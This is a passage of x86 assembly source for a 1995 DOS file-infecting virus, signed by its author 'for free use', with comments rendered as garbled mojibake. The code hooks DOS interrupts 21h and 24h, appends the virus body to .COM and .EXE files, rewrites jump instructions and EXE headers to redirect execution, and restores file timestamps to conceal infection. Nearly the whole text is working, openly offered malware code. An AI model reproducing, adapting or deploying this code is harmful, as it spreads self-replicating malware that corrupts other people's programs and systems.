mov ax,5701h ; <20><><EFBFBD><E2A0AD><EFBFBD><EFBFBD> <20><><EFBFBD><20><><EFBFBD><EFBFBD><><E4A0A9>.
mov cx,es:[di+13] ;<- Time
mov dx,es:[di+15] ;<- Date
int 21h
exit_close:
mov ah,3eh ; <20><><20><><EFBFBD><20><><EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD> DOS'<27> -
int 21h ; <20><><EFBFBD><EFBFBD><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD>!
exit_pop:
lds dx,cs:[offset ofs_24h-offset virr]
mov ax,2524h ; <20><><EFBFBD><E2A0AD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> int 24h
int 21h
pop bp
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
exit_all:
db 0eah
ofs_21h dw 0000
seg_21h dw 0000
int_21h_entry endp
;-------------------------------------------------------------------
infecting:
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
push bp
push ds
push dx
;------------------------------------------------------------------
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E2A0A2> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> int 24h <20><> <20><><EFBFBD> <20><><EFBFBD><E0A0A1>稪 - <20>.<2E>. <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>砥 "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><><EFBFBD><E1AAA5> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS'<27> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
; Write protect error ...
mov al,24h
mov si,offset ofs_24h-offset virr
mov dx,offset int_24h_entry-offset virr
call inst_int
pop dx
pop ds
;-Open file...-----------------------------------------------------
mov ax,3d00h
int 21h
jc exit_pop
;-Read header (EXE) or first 4 byte (COM).-------------------------
mov bh,3fh
xchg ax,bx
mov cx,18h
push cs
pop ds
mov dx,offset origin_2_byte-offset virr
mov si,dx
int 21h ; <20><><EFBFBD><EFBFBD><EFBFBD><EBA2A0> <20> <20><><EFBFBD><EFBFBD><EFBFBD> 24 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>!
_1:
jc exit_close ; <20><20><EFBFBD><E8A8A1>,<2C><> <20><><EFBFBD><EFBFBD><> <20> <20><EFBFBD><EBA9A4>.
;-Look SFT file!-----------------------------
; <20><><EFBFBD><EFBFBD><EFBFBD><E2A2A5><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> "<22><><EFBFBD><EEACA8><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> - <20><>-<2D><> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><><E2A0AA>
;<3B><><EFBFBD><EFBFBD><EFBFBD><><E0A0A7><EFBFBD><EFBFBD>!<21> ⠪,<2C><><EFBFBD> <20><> <20><><EFBFBD> :
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><20><><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><> <20><EFBFBD> <20><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><E2A0AA><EFBFBD>
; <20><><EFBFBD><E2A8AD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><20> <20><><EFBFBD><E2A0AD><EFBFBD><EFBFBD> <20><><EFBFBD>⮢,<2C><><EFBFBD><EFBFBD><E9A5AD><><E4A0A9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><><E3AAA0><EFBFBD>!
; <20> <20><><EFBFBD> <20><><EFBFBD><E1AAAE><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><E0A5AD><EFBFBD> <20><><EFBFBD><EFBFBD><E0AEA1><EFBFBD><EFBFBD><EFBFBD> DOS'<27>!
; (<28><><EFBFBD><><E3AFAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><E0A0A1><EFBFBD> <20>.<2E>.<2E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><E2A5AC><EFBFBD> <20><EFBFBD><E3ADAA><EFBFBD><EFBFBD>
; MS-DOS" (<28><><EFBFBD>. 67) (<28><20><> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEAD><EFBFBD> <20><><EFBFBD><EFBFBD><E7ADA8> Help PC)
; (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0A8AC><EFBFBD><EFBFBD><EFBFBD> <20> RC-0-512 (666,Written by Dark Avenger.)
; <20><><EFBFBD> SFT -- System File Table - (<28><><EFBFBD><EFBFBD><E2A5AC><EFBFBD><><E2A0A1><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><><E4A0A9><EFBFBD>.)
;<3B><><EFBFBD><><E1AEA7><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EBA2A0><EFBFBD><EFBFBD><EFBFBD><><E4A0A9> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E0ACA0><EFBFBD> <20><EFBFBD><E1AFAE><EFBFBD><EFBFBD><E3A5AC>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E2A2A5><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD><EFBFBD><EBA2A0><EFBFBD> DOS'<27>!!!
;
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><E9A5AD> <20><EFBFBD><E7A5A9> <20><> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E7A5AD>
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>.(<28><><EFBFBD>.) <20> <20>
; <20> <20>
; 00 <20> 1w <20> <20><><EFBFBD>-<2D><> <20><><EFBFBD><EFBFBD><EFBFBD><E0A8AF><20><><EFBFBD><EFBFBD><E0A5AF><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><><E4A0A9><EFBFBD>
; 02 <20> 1b <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
; 04 <20> 1b <20> <20><><EFBFBD><E0A8A1><EFBFBD><><E4A0A9>
; 11 <20> 1w <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0A2AE> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><><E4A0A9>
; 13 <20> 1w <20> <20><EFBFBD> <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>樨 䠩<><E4A0A9>
; 15 <20> 1w <20> <20><><EFBFBD><EFBFBD> ...
; 17 <20> 2w <20> <20><><EFBFBD><EFBFBD><EFBFBD><><E4A0A9>
; 21 <20> 2w <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><E4A0A9>
; 32 <20> 11b <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0A5AD><><E4A0A9> (<28><><EFBFBD> '.')
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
mov ax,1220h ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
push bx ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> SFT <20> <20><><EFBFBD><EFBFBD> ES:DI
int 2fh ;
mov bl,es:[di] ;
mov ax,1216h ;
int 2fh ;
pop bx ;
mov byte ptr es:[di+2],02 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<21><20><><EFBFBD><EFBFBD><EFBFBD><E2A2A8> <20><>
;ᤥ<><E1A4A5><EFBFBD><EFBFBD> ⠪,<2C><><EFBFBD><><E2A5AF><EFBFBD> DOS
;<3B><><EFBFBD><EFBFBD>,<2C><><EFBFBD><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD><EFBFBD><EBA2A0><EFBFBD>!
; <20>.<2E>. <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;᭨<><E1ADA8><EFBFBD><EFBFBD> <20><><EFBFBD><E0A8A1><EFBFBD><><E4A0A9>!
mov bp,es:[di+17] ; BP = file len!
;---------------------------------------------
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0AEA2><20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>.
lodsb
dec si
cmp al,'M' ; MZ - <20><EFBFBD><E0A8A7><EFBFBD><>,<2C><><EFBFBD> <20><><EFBFBD> .EXE 䠩<>!
jz _EXE
cmp al,90h ; NOP - <20><20><><EFBFBD> .COM 䠩<> <20><> <20><EFBFBD><20><><EFBFBD> <20><>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!(<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>)
_1d:
jz exit_close
;-Infect .COM --------------------------------
; <20><><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD> .COM 䠩<><E4A0A9>!
xchg ax,bp
cmp ax,65000
ja exit_close ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E2A8AC>.
mov es:[di+21],ax ;<3B><EFBFBD><E2A0A2><><E4A0A9><EFBFBD><EFBFBD><EFBFBD><><E3AAA0><EFBFBD> <20>
;<3B><><EFBFBD><EFBFBD><EFBFBD><><E4A0A9>!
;-Make JMP------------------------------------
; <20>.<2E>. <20><><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EBA2A0> <20> <20><><EFBFBD> .COM 䠩<><E4A0A9> <20><><EFBFBD><EFBFBD><20><><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
;<3B><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E1ABA8> ᬥ饭<E1ACA5><E9A5AD> <20><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>!
sub ax,04
mov ds:[offset jmp_n-offset virr],ax
call write_virus ; <20><><20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><><E4A0A9>!
mov cx,04h ; <20><><E2A5AF><EFBFBD> <20><><20> <20><><EFBFBD><><E4A0A9> <20><><EFBFBD><><E1A0AC>
mov dx,offset new_3_byte-offset virr ; <20><><EFBFBD><EFBFBD>室!
exit_write:
mov ah,40h
int 21h
_1b: jmp exit_date
;-Sub. for write virus body (only) in file.----
write_virus proc
xor dx,dx
mov ah,40h
mov cx,offset ax_len-offset virr
int 21h
mov es:[di+21],dx ; F.P = start file!
mov es:[di+23],dx
cmp ax,cx
jnz _1c
ret
_1c:
pop ax
jmp _1b ; exit_date!
write_virus endp
;-Infect .EXE ---------------------------------
_EXE:
; <20><><E2A5AF><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><><E4A0A9>, <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E1A0AD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; .EXE 䠩<><E4A0A9>! <20> <20><20><><EFBFBD> <20><><><E1AEA9><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><E1A0AD> <20> SFT, <20><> <20><> <20><><EFBFBD><EFBFBD>,<2C><><EFBFBD>
; <20><><EFBFBD><>, ᮤ<>ঠ騩 <20><><EFBFBD><EFA2AD> <20><><EFBFBD><EFBFBD> <20> <20><> <20><><EFBFBD><E0A0A6><EFBFBD> <20><><EFBFBD>!
mov ax,ds:[si+4] ; Pages (512b).
dec ax
mov cx,512
mul cx
add ax,[si+2] ; AX = File len from header.
cmp ax,bp ; Real file len = ax ?
jnz _1b ; No - this is overlay.
;-----
mov es:[di+21],ax ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><><E4A0A9>.
mov es:[di+23],dx
;-Get header.-----------------------------------
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E1AAA0> .EXE <20>ணࠬ<E0AEA3><E0A0AC>!
mov ax,[si+14h]
mov ds:[offset IP_file-offset virr],ax
mov ax,[si+16h]
mov ds:[offset CS_file-offset virr],ax
;-----------------------------------------------
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> (<28>.<2E>. <20><><EFBFBD> <20><><EFBFBD><EFBFBD><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>)
xchg ax,bp
mov cx,10h
div cx
sub ax,[si+8]
sbb dx,0
mov [si+16h],ax ; ReloCS.
mov [si+14h],dx ; ExeIP.
;-Correcting file len in header.----------------
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><EFBFBD><E0A5AA><EFBFBD><20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .EXE 䠩<><E4A0A9>!
;(<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<21><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> = 385 ,<2C> <20><><><E3A2A5><EFBFBD><E7A8A2><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><><E4A0A9> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><> <20><> 385 ,<2C> <20><> 512!!!<21>.<2E>. ⥯<><E2A5AF><EFBFBD> <20><><EFBFBD> "㬭<><E3ACAD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD>
; <20><><EFBFBD><EFBFBD><>).<2E><><EFBFBD><EFBFBD><EFBFBD><E2A2A5><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><EFBFBD><E1AEA1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><><EFA2AB><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0A8A7><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD><EFBFBD>,-
; <20><> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><E0A0A6><EFBFBD> <20><><EFBFBD><EFBFBD>!
inc word ptr ds:[si+4]
;-Write virus to file.--------------------------
call write_virus
;-Write new header.-----------------------------
mov cx,18h
mov dx,si ; DX = offset header.
jmp exit_write ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E2AEA2> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><E0A5A4><EFBFBD> <20><><EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD> <20><>
;<3B><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> int 21h!
;----------------------------------------------
inst_int proc
mov ah,35h
int 21h
mov ds:[si],bx
mov ds:[si+2],es
mov ah,25h
int 21h
ret
inst_int endp
new_3_byte db 90h ; NOP
db 0e9h ; JMP nn
jmp_n dw 0000 ; nn
;-Header for EXE file & buffer for first 5 bytes COM's file.--
origin_2_byte:
header:
db 4 dup (90h) ; NOPs
ax_len db ?
db 20h dup (?) ; For EXE header.
ofs_24h dw ?
seg_24h dw ?
;********************************************************
cseg ends
end start
;-- Written by Light General.Kiev.1995.For free use! ----
Copy Permalink